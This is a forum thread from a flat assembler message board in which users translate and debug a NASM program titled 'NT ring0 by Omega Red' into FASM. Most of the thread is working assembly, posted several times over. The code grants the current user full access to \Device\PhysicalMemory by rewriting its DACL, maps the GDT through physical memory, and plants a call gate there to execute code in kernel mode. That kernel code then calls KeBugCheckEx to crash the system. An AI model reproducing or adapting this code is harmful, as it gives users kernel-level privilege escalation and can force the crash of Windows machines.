flat assembler
Message board for the users of flat assembler.

Index > Windows > Help transalating fixing huge nasm code

Goto page Previous  1, 2
Author
Thread Post new topic Reply to topic
okasvi



Joined: 18 Aug 2005
Posts: 382
Location: Finland
okasvi 05 Mar 2006, 19:02
i noticed that when im importing Nt* api's from ntdll.dll when debugging it they are Zw* and when debugging original nasm version they arent... so it didnt import them from ntdll.dll or?



edit:
maybe it has some effect that nasm version is linked and linker does import by ordinal?


Description:
Filesize: 22.18 KB
Viewed: 6825 Time(s)

imports_by_ordinal.png



_________________
When We Ride On Our Enemies
support reverse smileys |:
Post 05 Mar 2006, 19:02
View user's profile Send private message MSN Messenger Reply with quote
shism2



Joined: 14 Sep 2005
Posts: 248
shism2 05 Mar 2006, 19:41
We have some of the equates or structures wrong... That's the only reason it wouldn't work
Post 05 Mar 2006, 19:41
View user's profile Send private message Reply with quote
okasvi



Joined: 18 Aug 2005
Posts: 382
Location: Finland
okasvi 05 Mar 2006, 19:55
went thru all pushes and they seem to be identical (when pushing equates)

so structure most likely...

im guessing this is wrong:
Code:
        EXPLICIT_ACCESS_SIZE equ EXPLICIT_ACCESS_END-EXPLICIT_ACCESS_BEG
        access: 
        times EXPLICIT_ACCESS_SIZE dd 0
        
        EXPLICIT_ACCESS_BEG:
        struct EXPLICIT_ACCESS
                grfAccessPermissions            dd      ?
                grfAccessMode                                           dd      ?
                grfInheritance                                  dd      ?
                Trustee                                                                 dd      ?
        ends
        struct TRUSTEE
                pMultipleTrustee                                        dd      ?
                MultipleTrusteeOperation        dd      ?
                TrusteeForm                                                             dd      ?
                TrusteeType                                                             dd      ?
                ptstrName                                                                       dd      ?
        ends
        EXPLICIT_ACCESS_END:    

_________________
When We Ride On Our Enemies
support reverse smileys |:
Post 05 Mar 2006, 19:55
View user's profile Send private message MSN Messenger Reply with quote
okasvi



Joined: 18 Aug 2005
Posts: 382
Location: Finland
okasvi 05 Mar 2006, 20:06
i found original coder's include files Smile

google<3

_________________
When We Ride On Our Enemies
support reverse smileys |:
Post 05 Mar 2006, 20:06
View user's profile Send private message MSN Messenger Reply with quote
shism2



Joined: 14 Sep 2005
Posts: 248
shism2 05 Mar 2006, 20:16
where where show me
Post 05 Mar 2006, 20:16
View user's profile Send private message Reply with quote
okasvi



Joined: 18 Aug 2005
Posts: 382
Location: Finland
okasvi 05 Mar 2006, 20:55
eh, somewhat obvious Razz

google for " "Omega Red" nasm "
1st link -> asm -> inc.zip

add me to your msn...

_________________
When We Ride On Our Enemies
support reverse smileys |:
Post 05 Mar 2006, 20:55
View user's profile Send private message MSN Messenger Reply with quote
shism2



Joined: 14 Sep 2005
Posts: 248
shism2 05 Mar 2006, 22:03
I did but you don't show up.. Btw I got it working and the problem was the obj attributes struct
Post 05 Mar 2006, 22:03
View user's profile Send private message Reply with quote
shism2



Joined: 14 Sep 2005
Posts: 248
shism2 05 Mar 2006, 22:09
Code:
OBJ_CASE_INSENSITIVE            equ     40h
OBJ_KERNEL_HANDLE               equ 200h
SE_KERNEL_OBJECT                equ     6
DACL_SECURITY_INFORMATION       equ     4
GRANT_ACCESS                    equ     1
NO_INHERITANCE equ 0
NO_MULTIPLE_TRUSTEE equ  0
TRUSTEE_IS_NAME                 equ 1
TRUSTEE_IS_USER                 equ 1 
KGDT_R0_CODE  equ 8
REVOKE_ACCESS equ 800
SYSTEM_MODULE_SIZE equ 284
MAX_MODULE_COUNT equ 1024
SYSTEM_MODULE_INFORMATION_SIZE equ 290820
SystemModuleInformation                                 equ     11
MAXIMUM_FILENAME_LENGTH                                 equ     256
          gdt:
        gdt_limit               rw      1
        gdt_base                  rd    1
        
        farcall:                        rw      3
        txtbuf                  rb      4096
        mem_section             rd      1
        mapped_size             rd      1
        map_base                  rd    1
        p_old_dacl              rd      1
        p_new_dacl              rd      1
        p_sec_descr             rd      1
        sys_info                                SYSTEM_INFO
        ntoskrnl                        rd      1
        align 4
        modinfo                 rb      SYSTEM_MODULE_INFORMATION_SIZE

     m_caption          db              "NT ring0 by Omega Red",0
        f_err                           db              "Error: %s, code: 0x%x",0
        e_opens1                        db              "NtOpenSection for DACL access failed",0
        e_opens2                        db              "NtOpenSection for r/w failed",0
        e_getsec                        db              "GetSecurityInfo failed",0
        e_setacl                        db              "SetEntriesInAclA failed",0
        e_setsec                        db              "SetSecurityInfo failed",0
        e_maps                  db              "NtMapViewOfSection failed",0
        e_unmaps                        db              "NtUnmapViewOfSection failed",0
        e_query                 db              "NtQuerySystemInformation failed",0
        e_ntos                  db              "ntoskrnl.exe module not found in memory!",0
        s_cur_user              db              "CURRENT_USER",0

        align 4
        callgate                        dw              0                                                       ; low part of address
                                                dw              8                                                       ; segment selector: #define KGDT_R0_CODE    8
                                                dw              1110110000000001b               ; misc bits ;P (5 lowest = # of params)
                                                dw              0                                                       ; high part of address

        align 4
        s_mem_dev_uni   du              "\Device\PhysicalMemory"

                                                
        mem_dev_uni_len equ     $-s_mem_dev_uni

        align 4
        mem_dev_name:           ; unicode_string
                                        dw              mem_dev_uni_len
                                        dw              mem_dev_uni_len+2
                                        dd              s_mem_dev_uni

        phys_address    dd      0,0

        align 4
        
          
        access:         
        times   EXPLICIT_ACCESS_SIZE    db      0

     align 4
     
        obj_attr:       dd              OBJECT_ATTRIBUTES_SIZE
                                        dd              0
                                        dd              mem_dev_name
                                        dd              OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE
                                        dd              0
                                        dd              0


   

     struct SYSTEM_MODULE
                 Reserved1 rd 1
                Reserved2 rd 1
                ImageBaseAddress  rd 1
                ImageSize rd 1 ; bytes
                Flags rd 1
                Index rw 1 ; zero based
                wRank rw 1 ; 0 if not assigned
                Unknown  rw 1
                ModuleNameOffset rw 1
                ImageName rb MAXIMUM_FILENAME_LENGTH
        ends
     
     ring0start:
     mov                edi, modinfo
        mov             ecx, SYSTEM_MODULE_INFORMATION_SIZE/4
        xor             eax, eax
        rep             stosd

; get allocation granularity (used in memory mapping)
        invoke  GetSystemInfo, sys_info

        ; find NtOsKrnl base
        call            GetNtoskrnl

        ; open handle to the object
        invoke          NtOpenSection, mem_section, WRITE_DAC OR READ_CONTROL, obj_attr
        stdcall NtErrorTest ,e_opens1

        ; get security descriptor
        invoke          GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr
        stdcall         ErrorTestZ, e_getsec

        ; modify access rights ;]
        mov             dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS
        mov             dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS
        mov             dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user

        ; create new acl
        invoke          SetEntriesInAcl, 1, access, [p_old_dacl], p_new_dacl
        stdcall         ErrorTestZ, e_setacl

        ; update security descriptor with new acl
        invoke          SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0
        stdcall         ErrorTestZ, e_setsec
        invoke          LocalFree, [p_sec_descr]
        invoke          NtClose, [mem_section]

        ; ok.. now we have writable physical memory ;]
        ; open it in r/w mode
        invoke          NtOpenSection, mem_section, SECTION_MAP_READ OR SECTION_MAP_WRITE, obj_attr
        stdcall         NtErrorTest, e_opens2

        ; setup callgate (proc offset)
        mov             eax, ring0_proc
        mov             [callgate], ax
        shr             eax, 16
        mov             [callgate+6], ax

        ; get gdt
        sgdt            [gdt]
        movzx           ebx, word [gdt_limit]
        mov             eax, [gdt_base]
        call            GetPhysicalAddress
        mov             [phys_address], eax
        stdcall         MapMemory, [gdt_base], ebx, PAGE_READWRITE

        ; install callgate to our ring0 code in gdt - entry #100 (free)
        ; this should *find* some empty descriptor, but i'm too lazy at the moment ;P
        mov             eax, [map_base]
        push            dword [callgate]
        pop             dword [eax+100*8]
        push            dword [callgate+4]
        pop             dword [eax+100*8+4]

        ; ok.. almost there.. prepare far call
        mov             word [farcall+4], 100*8+3       ; our callgate selector

        ; lock the ring0 code to minimize chance that it will be paged out
        ; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged...
        invoke          VirtualLock, ring0_proc, ring0_end-ring0_proc

        ; and.. jump!
        push            dword [ntoskrnl]
        call far [farcall]

        ; cleanup
        invoke          VirtualUnlock, ring0_proc, ring0_end-ring0_proc
        invoke          NtUnmapViewOfSection, -1, [map_base]
        stdcall         NtErrorTest, e_unmaps
        invoke          NtClose, [mem_section]
        ret
;--------------------------------------------------------------------
GetNtoskrnl:
        ; enum modules
        invoke          NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0
        stdcall         NtErrorTest, e_query
        mov             ebx, dword [modinfo]            ; count
        mov             esi, modinfo+4          ; 1st module

.1:                                                                     ; loop
        mov             edi, esi
        add             edi, SYSTEM_MODULE.ImageName
        invoke          PathFindFileName, edi
        or                      dword [eax], 20202020h  ; convert to lowercase
        cmp             dword [eax], 'ntos'
        jne             .2
        or                      dword [eax+4], 20202020h
        cmp             dword [eax+4], 'krnl'
        jne             .2
        or                      dword [eax+8], 20202020h
        cmp             dword [eax+8], '.exe'
        jne             .2

        ; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P)
        mov             eax, dword [esi+SYSTEM_MODULE.ImageBaseAddress] ; base in memory
        mov             [ntoskrnl], eax
        ret

.2:
        add             esi, SYSTEM_MODULE_SIZE
        dec             ebx
        jns             .1

        ; umm.. ntoskrnl not found - quite unlikely to happen ;]
        invoke          MessageBox, 0, e_ntos, 0, 0
        invoke          ExitProcess, 2
;--------------------------------------------------------------------
; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient
; input: linear address in eax
GetPhysicalAddress:
        cmp             eax, 80000000h
        jae             .1
        cmp             eax, 0A0000000h
        jb                      .1
        and             eax, 0FFFF000h
        ret
.1:
        and             eax, 1FFFF000h
        ret
;--------------------------------------------------------------------
; maps memory using \Device\PhysicalMemory

proc            MapMemory,base, size, access_mode
        mov             eax, [base]                     ; address
        xor             edx, edx
        push            eax
        div             dword [sys_info+SYSTEM_INFO.dwAllocationGranularity]    ; edx = offset
        mov             edi, edx
        pop             eax
        mov             ebx, [size]                     ; size
        inc             ebx
        mov             esi, ebx                                ; mapped size
        add             esi, edi
        sub             eax, edi
        call            GetPhysicalAddress
        mov             [phys_address], eax
        mov             [mapped_size], esi
        mov             eax, [mem_section]
        invoke          NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, [access_mode]
        add             [map_base], edi
        stdcall         NtErrorTest,e_maps
        ret
endp
;--------------------------------------------------------------------

proc    NtErrorTest, er_msg
        test            eax, eax
        jz                      .ok
        invoke          wsprintf, txtbuf, f_err, [er_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------

proc    ErrorTest,e_msg
        test            eax, eax
        jnz             .ok
        call            GetLastError
        invoke          wsprintf, txtbuf, f_err, [e_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------

proc    ErrorTestZ ,e1_msg
        test            eax, eax
        jz                      .ok
        invoke          GetLastError
        invoke  wsprintf, txtbuf, f_err, [e1_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------
; the real deal ;]
ring0_proc:
        cli
        mov             eax, [esp+8]                    ; param - ntoskrnl base

        push            ebx
        push            edx
        push            esi
        push            edi
; find KeBugCheckEx in exports
        mov             ebx, eax
        add             eax, [eax+0x3c]
        mov             edi, dword [eax+0x78]
        add             edi, ebx
        mov             esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
        add             esi, ebx

        xor             edx, edx
.name:
        mov             eax, [esi]
        add             eax, ebx
        ; check function name
        cmp             dword [eax+00h], "KeBu"
        jne             .F
        cmp             dword [eax+04h], "gChe"
        jne             .F
        cmp             dword [eax+08h], "ckEx"
        jne             .F
        mov             eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfOrdinals]
        add             eax, ebx
        movzx           esi, word [edx*2+eax]
        mov             eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
        add             eax, ebx
        mov             esi, [esi*4+eax]
        add             esi, ebx
        jmp             .fnd
.F:
        add             esi, 4
        inc             edx
        cmp             edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
        jne             .name
.fnd:
        mov             eax, esi

        pop             edi
        pop             esi
        pop             edx
        pop             ebx

;       int3
        stdcall         eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe
        retf 4
ring0_end:    
Post 05 Mar 2006, 22:09
View user's profile Send private message Reply with quote
shism2



Joined: 14 Sep 2005
Posts: 248
shism2 06 Mar 2006, 03:24
The only problem now is that the file IS HUGE compared to the original nasm file.. And the problem causing that is


modinfo rb SYSTEM_MODULE_INFORMATION_SIZE
Post 06 Mar 2006, 03:24
View user's profile Send private message Reply with quote
LocoDelAssembly
Your code has a bug


Joined: 06 May 2005
Posts: 4624
Location: Argentina
LocoDelAssembly 06 Mar 2006, 04:04
Move it at the end of the source code. In fact, to save even more space put ALL the uninitialized data join together at the end of source.
Post 06 Mar 2006, 04:04
View user's profile Send private message Reply with quote
okasvi



Joined: 18 Aug 2005
Posts: 382
Location: Finland
okasvi 06 Mar 2006, 04:22
reorder your sources to be like this

1st [---equ's---]

2nd [---code---]

3rd
Code:
;--------------------------------------------------------------------
section '.data' data readable writeable
        m_caption               db              "NT ring0 by Omega Red",0
        f_err                           db              "Error: %s, code: 0x%x",0
        e_opens1                db              "NtOpenSection for DACL access failed",0
        e_opens2                db              "NtOpenSection for r/w failed",0
        e_getsec                db              "GetSecurityInfo failed",0
        e_setacl                db              "SetEntriesInAclA failed",0
        e_setsec                db              "SetSecurityInfo failed",0
        e_maps                  db              "NtMapViewOfSection failed",0
        e_unmaps                db              "NtUnmapViewOfSection failed",0
        e_query                 db              "NtQuerySystemInformation failed",0
        e_ntos                  db              "ntoskrnl.exe module not found in memory!",0
        s_cur_user      db              "CURRENT_USER",0

        align 4
        callgate        dw              0                                                       ; low part of address
                                                dw              8                                                       ; segment selector: #define KGDT_R0_CODE    8
                                                dw              1110110000000001b               ; misc bits ;P (5 lowest = # of params)
                                                dw              0                                                       ; high part of address

        align 4
        s_mem_dev_uni   du              "\Device\PhysicalMemory"
        mem_dev_uni_len equ     $-s_mem_dev_uni

        align 4
        mem_dev_name:           ; unicode_string
                                        dw              mem_dev_uni_len
                                        dw              mem_dev_uni_len+2
                                        dd              s_mem_dev_uni

        phys_address    dd      0,0

        align 4
        OBJECT_ATTRIBUTES_SIZE equ 24
  obj_attr: dd          OBJECT_ATTRIBUTES_SIZE 
            dd          0 
            dd          mem_dev_name 
            dd          OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE 
            dd          0 
            dd          0 

        align 4
        EXPLICIT_ACCESS_SIZE equ 32
        access: 
        times EXPLICIT_ACCESS_SIZE dd 0
        align 4
        struct TRUSTEE
                pMultipleTrustee rd 1
                MultipleTrusteeOperation rd 1
                TrusteeForm rd 1
                TrusteeType rd 1
                ptstrName rd 1
        ends
        TRUSTEE_SIZE equ 20
        align 4
        struct EXPLICIT_ACCESS
                grfAccessPermissions rd 1
                grfAccessMode rd 1
                grfInheritance rd 1
                Trustee rb TRUSTEE_SIZE
        ends
                
        struct SYSTEM_MODULE_INFORMATION
                dCount rd 1
                m_tam rb SYSTEM_MODULE_SIZE*MAX_MODULE_COUNT ; arbitrary max count - not defined anywhere
        ends

        struct SYSTEM_MODULE
                dReserved01 rd 1
                d04 rd 1
                pAddress rd 1
                dSize rd 1 ; bytes
                dFlags rd 1
                wId rw 1 ; zero based
                wRank rw 1 ; 0 if not assigned
                w18 rw 1
                wNameOffset rw 1
                abName rb MAXIMUM_FILENAME_LENGTH
        ends
        
;--------------------------------------------------------------------
section '.idata' import data readable writeable
library ntdll,'ntdll.dll',\
                                shlwapi,'shlwapi.dll',\
                                kernel32,'kernel32.dll',\
                                user32,'user32.dll',\
                                advapi32,'advapi32.dll'

import shlwapi,\
       PathFindFileName ,'PathFindFileNameA'

import ntdll,\
       NtClose,'NtClose',\
       NtMapViewOfSection,'NtMapViewOfSection',\
       NtOpenSection,'NtOpenSection',\
       NtQuerySystemInformation,'NtQuerySystemInformation',\
       NtUnmapViewOfSection,'NtUnmapViewOfSection'

import kernel32,\
                         GetProcAddress,'GetProcAddress',\
       GetSystemInfo,'GetSystemInfo',\
                         ExitProcess,'ExitProcess',\
       LoadLibrary,'LoadLibraryA',\
                         LocalFree,'LocalFree',\
                         VirtualLock,'VirtualLock',\
                         VirtualUnlock,'VirtualUnlock'

import advapi32,\
                         GetSecurityInfo,'GetSecurityInfo',\
                         SetEntriesInAcl,'SetEntriesInAclA',\
                         SetSecurityInfo,'SetSecurityInfo'

import user32,\
                         MessageBox,'MessageBoxA',\
                         wsprintf,'wsprintfA'

section '.udata' readable writeable

        struct IMAGE_EXPORT_DIRECTORY
                Characteristics           rd  1
                TimeDateStamp             rd  1
                MajorVersion              rw  1
                MinorVersion              rw  1
                nName                     rd  1
                nBase                     rd  1
                NumberOfFunctions         rd  1
                NumberOfNames             rd  1
                AddressOfFunctions        rd  1
                AddressOfNames            rd  1
                AddressOfNameOrdinals     rd  1
        ends
        
        gdt:
        gdt_limit               rw      1
        gdt_base                rd      1
        farcall:                rw      3
        txtbuf                  rb      4096
        mem_section     rd      1
        mapped_size     rd      1
        map_base                rd      1
        p_old_dacl      rd      1
        p_new_dacl      rd      1
        p_sec_descr     rd      1
        sys_info                SYSTEM_INFO
        ntoskrnl                rd      1
        align 4
        modinfo                 rb      SYSTEM_MODULE_INFORMATION_SIZE    

_________________
When We Ride On Our Enemies
support reverse smileys |:
Post 06 Mar 2006, 04:22
View user's profile Send private message MSN Messenger Reply with quote
madmatt



Joined: 07 Oct 2003
Posts: 1045
Location: Michigan, USA
madmatt 06 Mar 2006, 06:46
You need to put your large data into a ".bss" section
Post 06 Mar 2006, 06:46
View user's profile Send private message Reply with quote
LocoDelAssembly
Your code has a bug


Joined: 06 May 2005
Posts: 4624
Location: Argentina
LocoDelAssembly 06 Mar 2006, 13:52
Well, if you put the data on a separated section then you don't need to put uninitialized data at the end of the source but at the end of the section and the section can be placed anywhere.
Post 06 Mar 2006, 13:52
View user's profile Send private message Reply with quote
shism2



Joined: 14 Sep 2005
Posts: 248
shism2 06 Mar 2006, 19:26
Still got the problem

Code:
OBJ_CASE_INSENSITIVE            equ     40h
OBJ_KERNEL_HANDLE               equ 200h
SE_KERNEL_OBJECT                equ     6
DACL_SECURITY_INFORMATION       equ     4
GRANT_ACCESS                    equ     1
NO_INHERITANCE equ 0
NO_MULTIPLE_TRUSTEE equ  0
TRUSTEE_IS_NAME                 equ 1
TRUSTEE_IS_USER                 equ 1 
KGDT_R0_CODE  equ 8
REVOKE_ACCESS equ 800
SYSTEM_MODULE_SIZE equ 284
MAX_MODULE_COUNT equ 1024
SYSTEM_MODULE_INFORMATION_SIZE equ 290820
SystemModuleInformation                                 equ     11
MAXIMUM_FILENAME_LENGTH                                 equ     256

       
     ring0start:
     mov                edi, modinfo
        mov             ecx, SYSTEM_MODULE_INFORMATION_SIZE/4
        xor             eax, eax
        rep             stosd

; get allocation granularity (used in memory mapping)
        invoke  GetSystemInfo, sys_info

        ; find NtOsKrnl base
        call            GetNtoskrnl

        ; open handle to the object
        invoke          NtOpenSection, mem_section, WRITE_DAC OR READ_CONTROL, obj_attr
        stdcall NtErrorTest ,e_opens1

        ; get security descriptor
        invoke          GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr
        stdcall         ErrorTestZ, e_getsec

        ; modify access rights ;]
        mov             dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS
        mov             dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS
        mov             dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user

        ; create new acl
        invoke          SetEntriesInAcl, 1, access, [p_old_dacl], p_new_dacl
        stdcall         ErrorTestZ, e_setacl

        ; update security descriptor with new acl
        invoke          SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0
        stdcall         ErrorTestZ, e_setsec
        invoke          LocalFree, [p_sec_descr]
        invoke          NtClose, [mem_section]

        ; ok.. now we have writable physical memory ;]
        ; open it in r/w mode
        invoke          NtOpenSection, mem_section, SECTION_MAP_READ OR SECTION_MAP_WRITE, obj_attr
        stdcall         NtErrorTest, e_opens2

        ; setup callgate (proc offset)
        mov             eax, ring0_proc
        mov             [callgate], ax
        shr             eax, 16
        mov             [callgate+6], ax

        ; get gdt
        sgdt            [gdt]
        movzx           ebx, word [gdt_limit]
        mov             eax, [gdt_base]
        call            GetPhysicalAddress
        mov             [phys_address], eax
        stdcall         MapMemory, [gdt_base], ebx, PAGE_READWRITE

        ; install callgate to our ring0 code in gdt - entry #100 (free)
        ; this should *find* some empty descriptor, but i'm too lazy at the moment ;P
        mov             eax, [map_base]
        push            dword [callgate]
        pop             dword [eax+100*8]
        push            dword [callgate+4]
        pop             dword [eax+100*8+4]

        ; ok.. almost there.. prepare far call
        mov             word [farcall+4], 100*8+3       ; our callgate selector

        ; lock the ring0 code to minimize chance that it will be paged out
        ; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged...
        invoke          VirtualLock, ring0_proc, ring0_end-ring0_proc

        ; and.. jump!
        push            dword [ntoskrnl]
        call far [farcall]

        ; cleanup
        invoke          VirtualUnlock, ring0_proc, ring0_end-ring0_proc
        invoke          NtUnmapViewOfSection, -1, [map_base]
        stdcall         NtErrorTest, e_unmaps
        invoke          NtClose, [mem_section]
        ret
;--------------------------------------------------------------------
GetNtoskrnl:
        ; enum modules
        invoke          NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0
        stdcall         NtErrorTest, e_query
        mov             ebx, dword [modinfo]            ; count
        mov             esi, modinfo+4          ; 1st module

.1:                                                                     ; loop
        mov             edi, esi
        add             edi, SYSTEM_MODULE.ImageName
        invoke          PathFindFileName, edi
        or                      dword [eax], 20202020h  ; convert to lowercase
        cmp             dword [eax], 'ntos'
        jne             .2
        or                      dword [eax+4], 20202020h
        cmp             dword [eax+4], 'krnl'
        jne             .2
        or                      dword [eax+8], 20202020h
        cmp             dword [eax+8], '.exe'
        jne             .2

        ; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P)
        mov             eax, dword [esi+SYSTEM_MODULE.ImageBaseAddress] ; base in memory
        mov             [ntoskrnl], eax
        ret

.2:
        add             esi, SYSTEM_MODULE_SIZE
        dec             ebx
        jns             .1

        ; umm.. ntoskrnl not found - quite unlikely to happen ;]
        invoke          MessageBox, 0, e_ntos, 0, 0
        invoke          ExitProcess, 2
;--------------------------------------------------------------------
; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient
; input: linear address in eax
GetPhysicalAddress:
        cmp             eax, 80000000h
        jae             .1
        cmp             eax, 0A0000000h
        jb                      .1
        and             eax, 0FFFF000h
        ret
.1:
        and             eax, 1FFFF000h
        ret
;--------------------------------------------------------------------
; maps memory using \Device\PhysicalMemory

proc            MapMemory,base, size, access_mode
        mov             eax, [base]                     ; address
        xor             edx, edx
        push            eax
        div             dword [sys_info+SYSTEM_INFO.dwAllocationGranularity]    ; edx = offset
        mov             edi, edx
        pop             eax
        mov             ebx, [size]                     ; size
        inc             ebx
        mov             esi, ebx                                ; mapped size
        add             esi, edi
        sub             eax, edi
        call            GetPhysicalAddress
        mov             [phys_address], eax
        mov             [mapped_size], esi
        mov             eax, [mem_section]
        invoke          NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, [access_mode]
        add             [map_base], edi
        stdcall         NtErrorTest,e_maps
        ret
endp
;--------------------------------------------------------------------

proc    NtErrorTest, er_msg
        test            eax, eax
        jz                      .ok
        invoke          wsprintf, txtbuf, f_err, [er_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------

proc    ErrorTest,e_msg
        test            eax, eax
        jnz             .ok
        call            GetLastError
        invoke          wsprintf, txtbuf, f_err, [e_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------

proc    ErrorTestZ ,e1_msg
        test            eax, eax
        jz                      .ok
        invoke          GetLastError
        invoke  wsprintf, txtbuf, f_err, [e1_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------
; the real deal ;]
ring0_proc:
        cli
        mov             eax, [esp+8]                    ; param - ntoskrnl base

        push            ebx
        push            edx
        push            esi
        push            edi
; find KeBugCheckEx in exports
        mov             ebx, eax
        add             eax, [eax+0x3c]
        mov             edi, dword [eax+0x78]
        add             edi, ebx
        mov             esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
        add             esi, ebx

        xor             edx, edx
.name:
        mov             eax, [esi]
        add             eax, ebx
        ; check function name
        cmp             dword [eax+00h], "KeBu"
        jne             .F
        cmp             dword [eax+04h], "gChe"
        jne             .F
        cmp             dword [eax+08h], "ckEx"
        jne             .F
        mov             eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfOrdinals]
        add             eax, ebx
        movzx           esi, word [edx*2+eax]
        mov             eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
        add             eax, ebx
        mov             esi, [esi*4+eax]
        add             esi, ebx
        jmp             .fnd
.F:
        add             esi, 4
        inc             edx
        cmp             edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
        jne             .name
.fnd:
        mov             eax, esi

        pop             edi
        pop             esi
        pop             edx
        pop             ebx

;       int3
        stdcall         eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe
        retf 4
ring0_end:

section '.bss' readable writeable
 gdt:
        gdt_limit               rw      1
        gdt_base                  rd    1
        
        farcall:                        rw      3
        txtbuf                  rb      4096
        mem_section             rd      1
        mapped_size             rd      1
        map_base                  rd    1
        p_old_dacl              rd      1
        p_new_dacl              rd      1
        p_sec_descr             rd      1
        sys_info                                SYSTEM_INFO
        ntoskrnl                        rd      1
        align 4
        modinfo                 rb      SYSTEM_MODULE_INFORMATION_SIZE

     m_caption          db              "NT ring0 by Omega Red",0
        f_err                           db              "Error: %s, code: 0x%x",0
        e_opens1                        db              "NtOpenSection for DACL access failed",0
        e_opens2                        db              "NtOpenSection for r/w failed",0
        e_getsec                        db              "GetSecurityInfo failed",0
        e_setacl                        db              "SetEntriesInAclA failed",0
        e_setsec                        db              "SetSecurityInfo failed",0
        e_maps                  db              "NtMapViewOfSection failed",0
        e_unmaps                        db              "NtUnmapViewOfSection failed",0
        e_query                 db              "NtQuerySystemInformation failed",0
        e_ntos                  db              "ntoskrnl.exe module not found in memory!",0
        s_cur_user              db              "CURRENT_USER",0

        align 4
        callgate                        dw              0                                                       ; low part of address
                                                dw              8                                                       ; segment selector: #define KGDT_R0_CODE    8
                                                dw              1110110000000001b               ; misc bits ;P (5 lowest = # of params)
                                                dw              0                                                       ; high part of address

        align 4
        s_mem_dev_uni   du              "\Device\PhysicalMemory"

                                                
        mem_dev_uni_len equ     $-s_mem_dev_uni

        align 4
        mem_dev_name:           ; unicode_string
                                        dw              mem_dev_uni_len
                                        dw              mem_dev_uni_len+2
                                        dd              s_mem_dev_uni

        phys_address    dd      0,0

        align 4
        
          
        access:         
        times   EXPLICIT_ACCESS_SIZE    db      0

     align 4
     
        obj_attr:       dd              OBJECT_ATTRIBUTES_SIZE
                                        dd              0
                                        dd              mem_dev_name
                                        dd              OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE
                                        dd              0
                                        dd              0


   

     struct SYSTEM_MODULE
                 Reserved1 rd 1
                Reserved2 rd 1
                ImageBaseAddress  rd 1
                ImageSize rd 1 ; bytes
                Flags rd 1
                Index rw 1 ; zero based
                wRank rw 1 ; 0 if not assigned
